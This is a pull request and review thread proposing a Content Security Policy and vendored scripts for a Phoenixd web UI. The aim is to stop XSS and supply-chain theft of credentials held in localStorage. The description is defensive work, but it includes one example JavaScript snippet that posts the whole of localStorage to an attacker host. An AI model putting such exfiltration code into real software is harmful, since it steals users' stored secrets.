### PR TITLE
Cross Site Scripting (XSS) mitigations

### PR DESCRIPTION
**Pull request by 1ma**
This PR proposes to introduce a [Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP) for the webapp.

## The problem

`localStorage` is not an ideal place to store sensitive data such as Phoenixd API authentication credentials. The reason is that all JS scripts from a webpage are implicitly trusted (including JS scripts pulled from third party domains such as CDNs), and they all have read access to the browser's local storage for that website.

[tl;dr](https://dev.to/rdegges/please-stop-using-local-storage-1i04#why-local-storage-is-insecure-and-you-shouldnt-use-it-to-store-sensitive-data) if a hacker accessed jsDelivr's servers or gained access to Bootstrap's account he could upload a malicious version of the dependency with something like this hidden in it:

```js
const xhr = new XMLHttpRequest();
xhr.open("POST", "https://scraper.site/collect")
xhr.setRequestHeader("Content-Type", "application/json");
xhr.send(JSON.stringify(localStorage));
```

The least effort way to mitigate this threat is to make sure that all resources pulled from third parties have an SRI hash, but that's easy to forget (jsQR.js didn't have it, for instance).

However, the thorough and comprehensive way to do it is defining a Content Security Policy that locks down a lot of what the browser is allowed to do while rendering the site, and serving all potentially dangerous JS from our own domain.

## Breakdown of the proposed Policy

* `default-src: 'self'`

[Fallback directive](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/default-src) that covers all those directives that are not explicitly defined. [`'self'`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/Sources#self) means only the origin domain is allowed, over the same protocol and TCP port number.

This directive is giving its default value to `script-src`, so I haven't explicitly defined it. That's why I vendored in `bootstrap.bundle` and `jsQR`, as they cannot be pulled from jsDelivr anymore. `script-src: 'self'` also forbids inline scripts, so I moved the service worker registration from an inline script at Components/App.razor into wwwroot/js/script.js.

* `img-src 'self' data:`

Images can only be served from our origin, but also inline images which would be otherwise forbidden (they're needed for the BOLT-11/12 QRs to work).

* `style-src 'self' https://cdn.jsdelivr.net`

Stylesheets can either be served from our origin (css/app.css, etc) or jsdelivr. I haven't vendored in Bootstrap because external CSS resources are not as potentially dangerous as JS bundles, and keeping vendored files up to date is a bit cumbersome.

However this directive also forbids inline styles, so I created the `.cursor-pointer` class for the couple of places that I saw inline styles being used.

* `font-src 'self' https://cdn.jsdelivr.net`

Same as last one, but for fonts. We have both vendored-in fonts (Pixeloid) and external ones (Bootstrap icons).

* `connect-src 'self' ws:`

Only allow connections made from JS code to our own origin. Since self is always served either over http or https we also need to whitelist the websocket protocol for the Blazor websocket connection to work. `ws:` covers both plaintext websockets and websockets over TLS (wss:)

This is probably the most powerful directive as it neuters all kinds of malware that phones home, like the snippet I showed above.

* `object-src 'none'`

Forbid usage of `<object>` and `<embed>` elements. [Recommended value](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/object-src) from the CSP spec.

## Important security warning regarding this PR

Strangers asking out of the blue to vendor-in JS blobs in a repository is a red flag.

Please, if you are interested in these changes it is extremely important that you verify by yourself that https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/js/bootstrap.bundle.min.js and https://cdn.jsdelivr.net/npm/jsqr@1.4.0/dist/jsQR.min.js hash to the same values as the files I vendored-in before you consider merging this PR.

## Other small changes

* Calculated and added the SRI hash to bootstrap-icons using https://www.srihash.org/
* jsQR was pulling the unminified version from jsDelivr, whereas I vendored-in the minified version.

### CODE REVIEW

**Comment by Hodladi** [comment]
Thank you for taking your time creating this PR! I have been thinking alot about firstly local storage.

It's to me a temporary solution, partly because I don't want no database in the project and secondary I want to make a combined docker compose setup with phoenix server AND ui in same.

UI gets password, seed and port directly from config files of Phoenix server and uses them through environment variables between the two containers.

Anyhow, thanks again, I'm gonna look through your suggested changes once I'm back home from my vacation. Even though the future won't need local storage I still see your points about cdn's and the whole 'self' concept.

**Comment by 1ma** [comment]
Glad to hear that, since my next mission was trying to convince you of adding support for storing the credentials in the backend :smile: 

If I may give my opinion, I'd like to store the endpoint and password in `appsettings.json`. I like your idea but my plan is to run Phoenix Server and the UI natively on separate machines not even in the same network.

Even if you eventually phase out client side credential storage a CSP is always a good thing security-wise, so I don't think it'll make these changes irrelevant. Anyway, have a good one :+1:

**Comment by Hodladi** [comment]
Having it stored in appsettings.json was my first run and as a native .NET app it's real good.
Then you can use environment variables to set / read it.

I could probably make it conditional.
If appsettings have values then use that, if not then use local storage.

**Comment by Hodladi** [comment]
@1ma 
FYI i made a push to the repo with some changes.
appsettings.json now got the backend url and password to be set. If values is set, then its prioritized over setting set in UI and that feature to be able to set those variables in UI is disabled.

If its empty in appsettings.json then user can set the variables in UI and save to localStorage

**Comment by Hodladi** [comment]
And i looked through your PR and apporved it.

Thanks for your work!

**Pull request merged**
